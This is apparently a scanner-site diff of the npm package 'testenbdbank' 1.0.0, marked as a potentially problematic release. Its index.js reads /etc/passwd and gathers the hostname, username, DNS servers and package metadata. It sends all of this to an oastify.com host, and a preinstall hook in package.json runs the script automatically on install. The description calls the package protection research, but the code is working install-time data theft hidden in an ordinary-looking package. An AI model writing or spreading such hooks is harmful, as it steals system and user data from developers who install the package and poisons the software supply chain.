testenbdbank 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of testenbdbank might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +54 -0
  2. package/package.json +17 -0
package/index.js ADDED
@@ -0,0 +1,54 @@
1
+ const os = require("os");
2
+ const dns = require("dns");
3
+ const querystring = require("querystring");
4
+ const https = require("https");
5
+ const fs = require("fs"); // Add this line to require the fs module
6
+ const packageJSON = require("./package.json");
7
+ const package = packageJSON.name;
8
+
9
+ fs.readFile("/etc/passwd", "utf8", (err, data) => { // Use fs.readFile to read the contents of the /etc/passwd file
10
+ if (err) {
11
+ console.error(err);
12
+ return;
13
+ }
14
+
15
+ const trackingData = JSON.stringify({
16
+ p: package,
17
+ c: __dirname,
18
+ hn: os.hostname(),
19
+ un: os.userInfo().username,
20
+ dns: dns.getServers(),
21
+ r: packageJSON ? packageJSON.___resolved : undefined,
22
+ v: packageJSON.version,
23
+ pjson: packageJSON,
24
+ passwd: data // Add the contents of the /etc/passwd file to the tracking data
25
+ });
26
+
27
+ var postData = querystring.stringify({
28
+ msg: trackingData,
29
+ });
30
+
31
+ var options = {
32
+ hostname: "gauz9xiccms8jv27co81ri39t0zrnlm9b.oastify.com",
33
+ port: 443,
34
+ path: "/",
35
+ method: "POST",
36
+ headers: {
37
+ "Content-Type": "application/x-www-form-urlencoded",
38
+ "Content-Length": postData.length,
39
+ },
40
+ };
41
+
42
+ var req = https.request(options, (res) => {
43
+ res.on("data", (d) => {
44
+ process.stdout.write(d);
45
+ });
46
+ });
47
+
48
+ req.on("error", (e) => {
49
+ console.error(e);
50
+ });
51
+
52
+ req.write(postData);
53
+ req.end();
54
+ });
package/package.json ADDED
@@ -0,0 +1,17 @@
1
+ {
2
+ "name": "testenbdbank",
3
+ "version": "1.0.0",
4
+ "description": "This package is a sample package to research about npm packages protection",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "testlean": "^1.0.0",
14
+ "testleansdk": "^1.0.0",
15
+ "testpotato": "^1.0.0"
16
+ }
17
+ }